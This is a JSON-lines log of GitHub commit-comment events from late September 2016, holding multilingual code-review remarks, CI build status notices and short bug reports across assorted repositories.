{"id":"4637179927","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223628,"position":17,"line":16,"path":"src/pl/pikselke/mchw/listeners/PlayerInteractWorkBeanchListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:20:30Z","updated_at":"2016-09-29T13:20:30Z","body":"Metoda statyczna, jest tutaj **chyba** nie na miejscu"}},"created_at":"2016-09-29T13:20:30Z"}
{"id":"4637181185","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19223631,"position":13,"line":13,"path":"content.htm","commit_id":"145ad4b89876776b25020781739f4e1e367de33c","created_at":"2016-09-29T13:20:43Z","updated_at":"2016-09-29T13:20:43Z","body":"首页 > 动态信息 应该用a标签包一下"}},"created_at":"2016-09-29T13:20:43Z"}
{"id":"4637182924","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19223633,"position":null,"line":null,"path":null,"commit_id":"5063c0842a2d39b72b1e0c2b2cd7f604b7b74fcf","created_at":"2016-09-29T13:21:01Z","updated_at":"2016-09-29T13:21:01Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 148](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1266&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-29T13:21:01Z"}
{"id":"4637182964","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223634,"position":12,"line":11,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuitListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:21:02Z","updated_at":"2016-09-29T13:21:02Z","body":"Tutaj również: `static`"}},"created_at":"2016-09-29T13:21:02Z"}
{"id":"4637183420","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223636,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:21:06Z","updated_at":"2016-09-29T13:21:06Z","body":"dfgdsfgdfs\r\n"}},"created_at":"2016-09-29T13:21:06Z"}
{"id":"4637184494","type":"CommitCommentEvent","actor":{"login":"maxycode"},"repo":{"name":"EflyStudio/zhanqun-dby"},"payload":{"comment":{"id":19223641,"position":21,"line":21,"path":"content.htm","commit_id":"145ad4b89876776b25020781739f4e1e367de33c","created_at":"2016-09-29T13:21:16Z","updated_at":"2016-09-29T13:21:16Z","body":"缩进需要整理"}},"created_at":"2016-09-29T13:21:16Z"}
{"id":"4637186670","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19223646,"position":null,"line":null,"path":null,"commit_id":"5063c0842a2d39b72b1e0c2b2cd7f604b7b74fcf","created_at":"2016-09-29T13:21:37Z","updated_at":"2016-09-29T13:21:37Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 148](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1266&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **FAILURE**\nSummary: Compilation error: XbimXplorer\\XbimXplorer.csproj (new) Build time: 00:00:33"}},"created_at":"2016-09-29T13:21:37Z"}
{"id":"4637188416","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223650,"position":15,"line":14,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuitListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:21:57Z","updated_at":"2016-09-29T13:21:57Z","body":"Meh. Nie lepiej użyć `event.setMessage(\"sample text\");`?\r\nRównież nie poprawiłeś błędu z paragrafami, ChatColor się kłania."}},"created_at":"2016-09-29T13:21:57Z"}
{"id":"4637189134","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19223651,"position":25,"line":25,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"b1897577365258e01af792a133d9713a78b76494","created_at":"2016-09-29T13:22:05Z","updated_at":"2016-09-29T13:22:05Z","body":"Essa regra tá incompleta. Leia mais sobre o algoritmo."}},"created_at":"2016-09-29T13:22:05Z"}
{"id":"4637191441","type":"CommitCommentEvent","actor":{"login":"tb2010302"},"repo":{"name":"Floris497/mac-pixel-clock-patch-V2"},"payload":{"comment":{"id":19223662,"position":null,"line":null,"path":null,"commit_id":"660a0dbec1ea4055d4404d4bc6d2ecb0c820e033","created_at":"2016-09-29T13:22:31Z","updated_at":"2016-09-29T13:22:31Z","body":"Hi I just upgrade to 10.12 and using the core display patch. However, it doesn't work. It was working when I'm using 10.11 under the guide. But in 10.12 it stuck after I reboot the mac. Need help T_T "}},"created_at":"2016-09-29T13:22:31Z"}
{"id":"4637198525","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223673,"position":44,"line":44,"path":"src/pl/pikselke/mchw/scoreboard/ScoreBoardListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:23:46Z","updated_at":"2016-09-29T13:23:46Z","body":"Od siebie polecam zrobić osobną klasę z takowym taskiem, i zapętlać graczy online, np. tak:\r\n`Bukkit.getOnlinePlayers().stream().forEach(p -> p.setScoreboard(board));`"}},"created_at":"2016-09-29T13:23:46Z"}
{"id":"4637201312","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223680,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:24:18Z","updated_at":"2016-09-29T13:24:18Z","body":"dfgdfgdfgdsfg"}},"created_at":"2016-09-29T13:24:18Z"}
{"id":"4637205897","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19223690,"position":79,"line":79,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T13:25:08Z","updated_at":"2016-09-29T13:25:08Z","body":"We don't need to remove the tabbability of the opening/trigger button when opening the modal. Instead, focus gets moved upon opening to the first focusable in the modal (usually the close button, but it can be the first input if it's mostly a form, or an ok/cancel button if it's a text dialog), and then with the opening of the modal, focus gets trapped.\r\n\r\nTwo ways I know of to trap: one is set listeners on the first and last focusables in the modal, check if shift accompanied tab, and move to the other one where appropriate. This does not work on UAs where users use other methods of moving keyboard focus, like Opera's Presto engine with spatial navigation, but oh well...\r\nThe other is to listen to all things on the document (potentially expensive) and if they receive focus, check if they have an ancestor that === the modal. If not, focus gets manually put back inside the modal (first focusable). I haven't had good success with this one but it might be the better way to go as it could catch screen readers' virtual focus dropping to a focusable (they can always \"read\" out of modals unless aria-hidden is placed on the whole rest of the page) and then clicking Enter."}},"created_at":"2016-09-29T13:25:08Z"}
{"id":"4637206540","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19223693,"position":25,"line":25,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"b1897577365258e01af792a133d9713a78b76494","created_at":"2016-09-29T13:25:14Z","updated_at":"2016-09-29T13:25:14Z","body":"Ex: 1900 não é bissexto."}},"created_at":"2016-09-29T13:25:14Z"}
{"id":"4637210594","type":"CommitCommentEvent","actor":{"login":"ElessarST"},"repo":{"name":"ainGitHub/kinopoisk"},"payload":{"comment":{"id":19223701,"position":18,"line":18,"path":"src/main/java/ru/dz/entity/Cast.java","commit_id":"6380b292880db8a1372b61473695d9ebfbe5a067","created_at":"2016-09-29T13:25:54Z","updated_at":"2016-09-29T13:25:54Z","body":"в Java по code style используется camelCase, так что лучше здесь filmId"}},"created_at":"2016-09-29T13:25:54Z"}
{"id":"4637212259","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223704,"position":null,"line":null,"path":null,"commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:26:11Z","updated_at":"2016-09-29T13:26:11Z","body":"Ok, sumując - jest lepiej, ale dupy nie urywa. Dalej robisz po kilka listenerów, jak można to wpakować do jednego. I nie mówie tutaj o ilości klas, mówie tutaj o ilości metod, odwołującej się do danego eventu. Przecież te wszystkie listenery od broni, można zrobić w jednym, w ~40 linijek, używając do tego pętli i (ewentualnie) enumów."}},"created_at":"2016-09-29T13:26:11Z"}
{"id":"4637214021","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19223707,"position":12,"line":38,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"6991f75da081bfe51c72a89675c5292aa3c96118","created_at":"2016-09-29T13:26:30Z","updated_at":"2016-09-29T13:26:30Z","body":"não precisa dos ()"}},"created_at":"2016-09-29T13:26:30Z"}
{"id":"4637214479","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19223708,"position":64,"line":46,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T13:26:35Z","updated_at":"2016-09-29T13:26:35Z","body":":ok_hand: "}},"created_at":"2016-09-29T13:26:35Z"}
{"id":"4637217270","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19223710,"position":72,"line":2143,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-29T13:27:06Z","updated_at":"2016-09-29T13:27:06Z","body":"It's not a very good idea to use streams in diagnostics, cause lint-cli should work under JDK 1.7."}},"created_at":"2016-09-29T13:27:06Z"}
{"id":"4637219950","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19223715,"position":37,"line":50,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8c96b26fd28cdef59b89f8516697cb40ca4761e9","created_at":"2016-09-29T13:27:34Z","updated_at":"2016-09-29T13:27:34Z","body":"esse método está um pouco confuso.. pq ele retorna `boolean`? Onde isso foi solicitado? Pq existe outro método chamado `perdeVida`?"}},"created_at":"2016-09-29T13:27:34Z"}
{"id":"4637221527","type":"CommitCommentEvent","actor":{"login":"philosodad"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19223717,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T13:27:51Z","updated_at":"2016-09-29T13:27:51Z","body":"Well, for starters it seems to break the contract that all the other KeyUtils libraries have of working from or generating PEM files, for portability of keys between libraries."}},"created_at":"2016-09-29T13:27:51Z"}
{"id":"4637226838","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223728,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:28:47Z","updated_at":"2016-09-29T13:28:47Z","body":"dfgdfgdsfgdfgdfg"}},"created_at":"2016-09-29T13:28:47Z"}
{"id":"4637228502","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"EduardoDornel/crescer-2016-2"},"payload":{"comment":{"id":19223733,"position":11,"line":11,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"31b9122d84d6847a38db8df68820b336f5f5db9e","created_at":"2016-09-29T13:29:04Z","updated_at":"2016-09-29T13:29:04Z","body":"Dá pra deixar mais simples, que acha?"}},"created_at":"2016-09-29T13:29:04Z"}
{"id":"4637230119","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaCI/PkgBenchmark.jl"},"payload":{"comment":{"id":19223737,"position":3,"line":44,"path":"test/runtests.jl","commit_id":"b27307c30becfb6f14205547889aa3c0450d0ce1","created_at":"2016-09-29T13:29:20Z","updated_at":"2016-09-29T13:29:20Z","body":"don't use Pkg.dir, use `dirname(@__FILE__)`"}},"created_at":"2016-09-29T13:29:20Z"}
{"id":"4637230245","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19223738,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T13:29:21Z","updated_at":"2016-09-29T13:29:21Z","body":"yesterday i did something like this https://github.com/AOSP-JF-MM/platform_system_sepolicy/commit/b63da950ed9288ab6667e8d1450a0791cc1cd337\r\nand built fine...although rom cant boot...stays at first splash screen s4 9505....\r\ncan that be policies ?ramdisk? (about ramdisk i changed nothing.i am using pure cm tree and kernel)"}},"created_at":"2016-09-29T13:29:21Z"}
{"id":"4637234542","type":"CommitCommentEvent","actor":{"login":"j-w-s"},"repo":{"name":"j-w-s/student_picker"},"payload":{"comment":{"id":19223744,"position":null,"line":null,"path":null,"commit_id":"9ce5944b8bb72e185d9b17e3e99f48708d9a99ae","created_at":"2016-09-29T13:30:05Z","updated_at":"2016-09-29T13:30:05Z","body":"temp fix "}},"created_at":"2016-09-29T13:30:05Z"}
{"id":"4637240324","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19223760,"position":43,"line":2114,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-29T13:31:06Z","updated_at":"2016-09-29T13:31:06Z","body":"Formatting: `if (types.size() < 1) {` (space) here and there.\r\nBy the way, `size() < 1` == `isEmpty()` :wink:"}},"created_at":"2016-09-29T13:31:06Z"}
{"id":"4637245671","type":"CommitCommentEvent","actor":{"login":"mariangemarcano"},"repo":{"name":"Unity-Technologies/katana"},"payload":{"comment":{"id":19223773,"position":4,"line":194,"path":"slave/buildslave/bot.py","commit_id":"91cebd167895ac9c3c473c4153537147ea3a3ad7","created_at":"2016-09-29T13:32:01Z","updated_at":"2016-09-29T13:32:01Z","body":"@BarryUnity this should be changed to self._createCommandLogFile(manifest) \r\nwill remove the file generation"}},"created_at":"2016-09-29T13:32:01Z"}
{"id":"4637246399","type":"CommitCommentEvent","actor":{"login":"jessedearing"},"repo":{"name":"mercul3s/mercedescoyle.com-jekyll"},"payload":{"comment":{"id":19223774,"position":null,"line":null,"path":null,"commit_id":"e791dac05bf82babc55c65659cb2742a6e49362e","created_at":"2016-09-29T13:32:09Z","updated_at":"2016-09-29T13:32:09Z","body":"Great post! It has inspired me to look into a more sophisticated home networking setup."}},"created_at":"2016-09-29T13:32:09Z"}
{"id":"4637246494","type":"CommitCommentEvent","actor":{"login":"michbsd"},"repo":{"name":"varnish/varnish-modules"},"payload":{"comment":{"id":19223775,"position":null,"line":null,"path":null,"commit_id":"9558dbf9391cf15280fee442484aa2f2b0e25f6b","created_at":"2016-09-29T13:32:09Z","updated_at":"2016-09-29T13:32:09Z","body":"The change to vmod_softpurge.c breaks build on FreeBSD: \r\n\r\nvmod_softpurge.c: In function 'vmod_softpurge':\r\nvmod_softpurge.c:78: error: 'struct objcore' has no member named 'hsh_list'\r\nvmod_softpurge.c:81: error: 'OC_F_DYING' undeclared (first use in this function)\r\nvmod_softpurge.c:81: error: (Each undeclared identifier is reported only once\r\nvmod_softpurge.c:81: error: for each function it appears in.)\r\nvmod_softpurge.c:99: error: 'struct objcore' has no member named 'grace'\r\nvmod_softpurge.c:99: error: 'struct objcore' has no member named 'keep'"}},"created_at":"2016-09-29T13:32:09Z"}
{"id":"4637246776","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19223776,"position":null,"line":null,"path":null,"commit_id":"fa6e878903e4e8afb60ed96eb53c269eac011c7a","created_at":"2016-09-29T13:32:12Z","updated_at":"2016-09-29T13:32:12Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36313/testReport/) for this commit**"}},"created_at":"2016-09-29T13:32:12Z"}
{"id":"4637249573","type":"CommitCommentEvent","actor":{"login":"inesmartins"},"repo":{"name":"inesmartins/e-learning_platform--AngularJS"},"payload":{"comment":{"id":19223784,"position":null,"line":null,"path":null,"commit_id":"7de307b5d4c1e0d24f075dee0cb04609034db8eb","created_at":"2016-09-29T13:32:42Z","updated_at":"2016-09-29T13:32:42Z","body":"Hi here, \r\n\r\nWell, this app is basically the front-end of a larger project. \r\nIt consumes a Ruby on Rails API (back-end), so I'd say just on the top of my head to change this constant:\r\n\r\nmainApp.constant('railsServer', 'https://stukio-recipe.herokuapp.com');\r\n\r\nto something that makes sense to you:\r\nmainApp.constant('railsServer', 'my_web_server');"}},"created_at":"2016-09-29T13:32:42Z"}
{"id":"4637254210","type":"CommitCommentEvent","actor":{"login":"FrostyX"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19223791,"position":null,"line":null,"path":null,"commit_id":"a118c524f243c793c2579d4d58cd6c18b2fb9dcf","created_at":"2016-09-29T13:33:29Z","updated_at":"2016-09-29T13:33:29Z","body":":+1: "}},"created_at":"2016-09-29T13:33:29Z"}
{"id":"4637256981","type":"CommitCommentEvent","actor":{"login":"ericsstoll"},"repo":{"name":"mikeedwards83/Glass.Mapper"},"payload":{"comment":{"id":19223802,"position":null,"line":null,"path":null,"commit_id":"470d88c3ab3e14dba1a4edff3ca86baf42e2b175","created_at":"2016-09-29T13:33:58Z","updated_at":"2016-09-29T13:33:58Z","body":"Mike, we had to modify as follows to avoid null reference exception...\r\n\r\n\r\n                        **if (parameters != null)**\r\n                        {\r\n                            foreach (var key in parameters.AllKeys)\r\n                            {\r\n                                var fld = item.Fields[key];\r\n                                **if (fld == null) continue;**\r\n                                fld.SetValue(parameters[key], true);\r\n                            }\r\n                        }"}},"created_at":"2016-09-29T13:33:58Z"}
{"id":"4637257384","type":"CommitCommentEvent","actor":{"login":"juliengil"},"repo":{"name":"fifty-five/Cargo-iOS-Swift"},"payload":{"comment":{"id":19223803,"position":null,"line":null,"path":null,"commit_id":"c8b385eff6b0089c4e1aecfbc40a9195822310ef","created_at":"2016-09-29T13:34:03Z","updated_at":"2016-09-29T13:34:03Z","body":"adjusted the bundle id to correspond with the one set up in firebase and google analytics"}},"created_at":"2016-09-29T13:34:03Z"}
{"id":"4637260735","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19223806,"position":null,"line":null,"path":null,"commit_id":"a8c3ae91ce1e08a0a3c809ae5cf9086f5b8f63a9","created_at":"2016-09-29T13:34:37Z","updated_at":"2016-09-29T13:34:37Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=87)"}},"created_at":"2016-09-29T13:34:37Z"}
{"id":"4637261000","type":"CommitCommentEvent","actor":{"login":"juliengil"},"repo":{"name":"fifty-five/Cargo-iOS-Swift"},"payload":{"comment":{"id":19223808,"position":null,"line":null,"path":null,"commit_id":"c8b385eff6b0089c4e1aecfbc40a9195822310ef","created_at":"2016-09-29T13:34:39Z","updated_at":"2016-09-29T13:34:39Z","body":"+ added cargo.entitlements as suggested here : http://stackoverflow.com/a/39560078/6666611"}},"created_at":"2016-09-29T13:34:39Z"}
{"id":"4637262716","type":"CommitCommentEvent","actor":{"login":"umar-nawaz"},"repo":{"name":"edx/ecommerce"},"payload":{"comment":{"id":19223812,"position":35,"line":80,"path":"ecommerce/extensions/catalogue/management/commands/convert_course.py","commit_id":"aaf9026cda85a07a429416637bfadee99abeec06","created_at":"2016-09-29T13:34:56Z","updated_at":"2016-09-29T13:34:56Z","body":"don't forget to remove this."}},"created_at":"2016-09-29T13:34:56Z"}
{"id":"4637267283","type":"CommitCommentEvent","actor":{"login":"loevgaard"},"repo":{"name":"jenyak/tinypng-bundle"},"payload":{"comment":{"id":19223821,"position":null,"line":null,"path":null,"commit_id":"a9ec76ce9783fdfd0557a6a64d2ccb3e8fcb62af","created_at":"2016-09-29T13:35:42Z","updated_at":"2016-09-29T13:35:42Z","body":"Hi jenyak\r\n\r\nDoes it work with Symfony 2? Because then I will just modify the composer.json so it requires symfony 2|3"}},"created_at":"2016-09-29T13:35:42Z"}
{"id":"4637269960","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19223828,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T13:36:08Z","updated_at":"2016-09-29T13:36:08Z","body":"没怎么用过移动宽带。只有一次过节去亲戚家，顺便用了亲戚家电脑，发现网络响应\r\n速度比联通宽带快。因为外网我只访问了 Github，没觉得有墙中墙的感觉（可能只是\r\n以前，或者只有部分地区移动宽带会墙中墙吧）\r\n\r\n访问 Github 的速度，我这里移动比联通宽带快。不过，宽带还是要看是否 24 小时\r\n都很稳定，比如我这里晚 8-10 点看 bilibili 视频，速度大概只有 700-800 kb/s 左右。\r\n\r\n当然，还是得分地区看待，网络上都说联通无劫持，但我这里被劫持得很严重，一次\r\n误点了劫持页面的“设置屏蔽”，Windows 上直接被改了hosts，之后每次被劫持，\r\n都会跳转两次（联通沃页面 -> 推广：搜狗导航，2345之类的），我在 hosts 屏蔽了\r\n劫持地址，发现这依旧无法一劳永逸，因为劫持地址一直在变多。\r\n\r\nAndy\r\n\r\nSCaffrey <notifications@github.com>于2016年9月29日周四 下午9:12写道：\r\n\r\n> @andytimes <https://github.com/andytimes> 有墙中墙的感觉么 我们这里也是价格优惠 学校门口都有广告\r\n>\r\n> —\r\n> You are receiving this because you were mentioned.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/racaljk/hosts/commit/026d52fab9728f311b8edabaf8a4b598d207f5a7#commitcomment-19223496>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AHE348lzjzJhN8EBC4O6vkobubK9flE8ks5qu7lPgaJpZM4KJ1wK>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-29T13:36:08Z"}
{"id":"4637272017","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19223835,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-29T13:36:28Z","updated_at":"2016-09-29T13:36:28Z","body":"Yeah instance tag is the biggest concern\n\n2016年9月28日 下午8:53，\"Ola Bini\" <notifications@github.com>写道：\n\n> I'm not sure if we should assume the underlying transport leaks metadata.\n> As an example, you have Ricochet.\n> On the other hand, we have the instance tags...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/twstrike/otrv4/commit/3a93618c6359cf86672307e49acfb12735882f67#commitcomment-19217675>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABn5xMkFlkKyiGM9Glo8OUNAdgx_iflnks5quxoYgaJpZM4KICrW>\n> .\n>\n"}},"created_at":"2016-09-29T13:36:28Z"}
{"id":"4637273321","type":"CommitCommentEvent","actor":{"login":"jtopjian"},"repo":{"name":"jtopjian/terraform"},"payload":{"comment":{"id":19223837,"position":null,"line":null,"path":null,"commit_id":"0fe36b3f858aefc7d140726ddaba1d02212f1aa4","created_at":"2016-09-29T13:36:42Z","updated_at":"2016-09-29T13:36:42Z","body":"Yes, good catch 😄 "}},"created_at":"2016-09-29T13:36:42Z"}
{"id":"4637273860","type":"CommitCommentEvent","actor":{"login":"kmike"},"repo":{"name":"scrapy/scrapy"},"payload":{"comment":{"id":19223839,"position":39,"line":69,"path":"docs/topics/architecture.rst","commit_id":"3ac3ac4d925ee7ef1eb8be8dc6519606c0fbf9b0","created_at":"2016-09-29T13:36:47Z","updated_at":"2016-09-29T13:36:47Z","body":"Actually it repeats from step 1: start_requests are not sent to scheduler all in once, see https://github.com/scrapy/scrapy/issues/456"}},"created_at":"2016-09-29T13:36:47Z"}
{"id":"4637275633","type":"CommitCommentEvent","actor":{"login":"lachieh"},"repo":{"name":"themorrisonagency/Perch-Syntax-Highlighting"},"payload":{"comment":{"id":19223845,"position":null,"line":null,"path":null,"commit_id":"dbfbaaa4b1c4a04cf64bdbf39a58759f7ddad7ab","created_at":"2016-09-29T13:37:08Z","updated_at":"2016-09-29T13:37:08Z","body":"closes #3 "}},"created_at":"2016-09-29T13:37:08Z"}
{"id":"4637276436","type":"CommitCommentEvent","actor":{"login":"shashi"},"repo":{"name":"JuliaCI/PkgBenchmark.jl"},"payload":{"comment":{"id":19223848,"position":3,"line":44,"path":"test/runtests.jl","commit_id":"b27307c30becfb6f14205547889aa3c0450d0ce1","created_at":"2016-09-29T13:37:15Z","updated_at":"2016-09-29T13:37:15Z","body":"Ok"}},"created_at":"2016-09-29T13:37:15Z"}
{"id":"4637276483","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19223849,"position":57,"line":2128,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"3731f2ff2bbc53b1708660e72aa98b6a9b5603ec","created_at":"2016-09-29T13:37:16Z","updated_at":"2016-09-29T13:37:16Z","body":"What are you trying to avoid here?\r\nIf there's a bug in uast, it's better to fix it there."}},"created_at":"2016-09-29T13:37:16Z"}
{"id":"4637277875","type":"CommitCommentEvent","actor":{"login":"sanjayananda"},"repo":{"name":"cardosogabriel/bm-fundraising"},"payload":{"comment":{"id":19223852,"position":26,"line":186,"path":"index.html","commit_id":"04f5522c6df802406cd2d9156f2762bea12c876a","created_at":"2016-09-29T13:37:30Z","updated_at":"2016-09-29T13:37:30Z","body":"Thanks."}},"created_at":"2016-09-29T13:37:30Z"}
{"id":"4637281233","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19223860,"position":5,"line":179,"path":"templates/partials/contacts_content.html","commit_id":"b1d75cc6558aa01ca8c6c746e895226988c1f75c","created_at":"2016-09-29T13:38:06Z","updated_at":"2016-09-29T13:38:06Z","body":"yup, new contact -> new controller instance."}},"created_at":"2016-09-29T13:38:06Z"}
{"id":"4637293727","type":"CommitCommentEvent","actor":{"login":"jenyak"},"repo":{"name":"jenyak/tinypng-bundle"},"payload":{"comment":{"id":19223891,"position":null,"line":null,"path":null,"commit_id":"a9ec76ce9783fdfd0557a6a64d2ccb3e8fcb62af","created_at":"2016-09-29T13:40:12Z","updated_at":"2016-09-29T13:40:12Z","body":"@loevgaard I tested on Symfony 2.8 and there are no bugs yet"}},"created_at":"2016-09-29T13:40:12Z"}
{"id":"4637297144","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19223900,"position":null,"line":null,"path":null,"commit_id":"39c8f726046fb5cea9c074e7f41366e2f1d43f58","created_at":"2016-09-29T13:40:47Z","updated_at":"2016-09-29T13:40:47Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=88)"}},"created_at":"2016-09-29T13:40:47Z"}
{"id":"4637297152","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19223901,"position":null,"line":null,"path":null,"commit_id":"be9cbf2d6cc40c93445d0763c6ba6baaab749f03","created_at":"2016-09-29T13:40:47Z","updated_at":"2016-09-29T13:40:47Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=88)"}},"created_at":"2016-09-29T13:40:47Z"}
{"id":"4637297180","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19223902,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T13:40:47Z","updated_at":"2016-09-29T13:40:47Z","body":"I have no idea, i don't know what sources you are using, btw you should not have sepolicy errors if you use updated cm staging branches, i don't see people complaining about sepolicy compiling errors on cm"}},"created_at":"2016-09-29T13:40:47Z"}
{"id":"4637299815","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"mattymo/kargo"},"payload":{"comment":{"id":19223907,"position":4,"line":4,"path":"roles/kubernetes/node/tasks/traefik.yml","commit_id":"91c9e0291da32b71b67e60ccac2bf05692a6efea","created_at":"2016-09-29T13:41:14Z","updated_at":"2016-09-29T13:41:14Z","body":"AFAIKT, static pods apply runtime w/o a need to restart kubelet"}},"created_at":"2016-09-29T13:41:14Z"}
